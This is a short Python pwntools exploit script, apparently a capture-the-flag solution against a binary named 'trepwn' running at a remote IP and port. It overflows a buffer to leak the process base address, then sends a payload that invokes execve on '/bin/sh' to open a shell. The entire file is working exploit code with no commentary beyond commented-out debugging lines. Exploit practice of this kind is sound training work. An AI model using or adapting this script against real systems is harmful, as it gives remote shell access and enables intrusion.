from pwn import *
def write_a(content):
f.sendlineafter(">>","a")
f.sendlineafter(">>","d")
f.sendlineafter(">>",content.ljust(48,'\x00')+p64(addr))
#f=process("./trepwn",env={'LD_PRELOAD':'./libc.so'})
f=remote("211.159.175.39",8787)
f.sendlineafter("name :","koocola")
for i in range(5):
f.sendlineafter(">>","d")
#gdb.attach(proc.pidof(f)[0],"b* 0x555555554000+0xd72d6")
#f.sendlineafter(">>","\x00"*48+p64(0xc82003fcd0))
f.sendlineafter(">>","\x00"*48+p64(0xc82003fcd0+0x2000))
write_a("\x48"*17)
f.recvuntil("journey!\n")
f.recv(16)
#f.recvuntil("message: ")
base_addr=u64(f.recv(6).ljust(8,'\0'))-0xd744d
success("process base :"+hex(base_addr))
#payload="m"*0x10+p64(base_addr+0x186600)+p64(59)+p64(0xc82003fcd0+0x2000+0x40)+p64(0)+p64(0)+"/bin/sh\0"
payload="m"*0x10+p64(base_addr+0x18557c)+p64(59)+p64(0xc82003fcd0+0x2000+0x38)+p64(0)+p64(0)+"/bin/sh\0"
f.sendlineafter(">>",payload)
f.interactive()
